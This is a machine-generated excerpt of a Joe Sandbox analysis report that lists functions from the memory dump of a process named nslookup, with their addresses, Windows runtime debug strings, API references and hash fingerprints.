                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: e6e11be4a70755da057fc8439f116ca5c9a3975d7216c3ffed7326a9791dcd01
                                  • Instruction ID: b9c94bb481bb320b5f98b8bbf2a0246fc87aaa735962b889e160486a7d9d5524
                                  • Opcode Fuzzy Hash: e6e11be4a70755da057fc8439f116ca5c9a3975d7216c3ffed7326a9791dcd01
                                  • Instruction Fuzzy Hash: 0FE1E234614741EFD724CF28C884B6ABBE0BF49314F184A5DF5A68B2E1D774D986CB42
                                  Function 031EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03227B7F
                                  • RTL: Resource at %p, xrefs: 03227B8E
                                  • RTL: Re-Waiting, xrefs: 03227BAC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: cd96f08178a834b69b80bb38d553ea6b144931b01b2dc3f07655e423d06fe0ff
                                  • Instruction ID: 8c25685378264af4df416d55ab2735cd19d09ea06c96c7763213607a8e7e69b8
                                  • Opcode Fuzzy Hash: cd96f08178a834b69b80bb38d553ea6b144931b01b2dc3f07655e423d06fe0ff
                                  • Instruction Fuzzy Hash: A9410335709B029FC724CE29CC40B6AB7E5EF8D710F044A1DF956DB281D771E4858B91
                                  Function 031EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0322728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03227294
                                  • RTL: Resource at %p, xrefs: 032272A3
                                  • RTL: Re-Waiting, xrefs: 032272C1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: be83b5e7bca1555eee0407c4caa8dfafbb121b51346074ec8a1e55451b59ed05
                                  • Instruction ID: 78576030b4977527dcad13c82c58b56d3057551bcd85a928c61ac0b0bf5c7776
                                  • Opcode Fuzzy Hash: be83b5e7bca1555eee0407c4caa8dfafbb121b51346074ec8a1e55451b59ed05
                                  • Instruction Fuzzy Hash: B1411036718712AFC724CE28CC41B6ABBA5FF49710F144619F855EB281DB31E892CBD0
                                  Function 03262300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 293f33fe723434b7245c96825adf84f90a7537ee34f1dcea80289cd668487fe2
                                  • Instruction ID: a0f9a8246f61c4713950593b63e7288c3b8c60a88bf304501c170c837ed781c8
                                  • Opcode Fuzzy Hash: 293f33fe723434b7245c96825adf84f90a7537ee34f1dcea80289cd668487fe2
                                  • Instruction Fuzzy Hash: D3316676A10719DFDB20DE29DC40BEEB7B8EF44650F444956E849E7240EB309AD48BA0
                                  Function 031F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 064cfb4858e24f35e14f4da9362a02303851d4d4ea55adb8bef7727b8ec6ed18
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: D191B270E0021A9FDF24DF69C890ABEF7A5EF4C7A0F58461AEA75E72C0D73099918750
                                  Function 031B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 5babf18868eaabe73382cacc2d88f480ca74a59467e501f0f5f1188d35e052b9
                                  • Instruction ID: f830db42e6bab6c68c4c20df710630817d525c2faa33b6c1638f39841e083472
                                  • Opcode Fuzzy Hash: 5babf18868eaabe73382cacc2d88f480ca74a59467e501f0f5f1188d35e052b9
                                  • Instruction Fuzzy Hash: FC814875D10269DBDB25DB54CD44BEEB7B8AF08710F0445EAEA19B7280E7709E81CFA0
                                  Function 0323CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0323CFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Cw@4Cw
                                  • API String ID: 4062629308-3101775584
                                  • Opcode ID: 3ff3d0b35d191b9c6af7a5a69b49d704a78a3e8aaa3cdbd416e2ecc1b1dd631a
                                  • Instruction ID: f9df77bb1e2ce60ecd1ce68c6af973a271ba2bd0b1188d0ac307b929de3c5cc0
                                  • Opcode Fuzzy Hash: 3ff3d0b35d191b9c6af7a5a69b49d704a78a3e8aaa3cdbd416e2ecc1b1dd631a
                                  • Instruction Fuzzy Hash: B941BEB5A20765DFCB21DFA9C840AAEFBB8FF49B10F04442AE914DB254D774D881CB60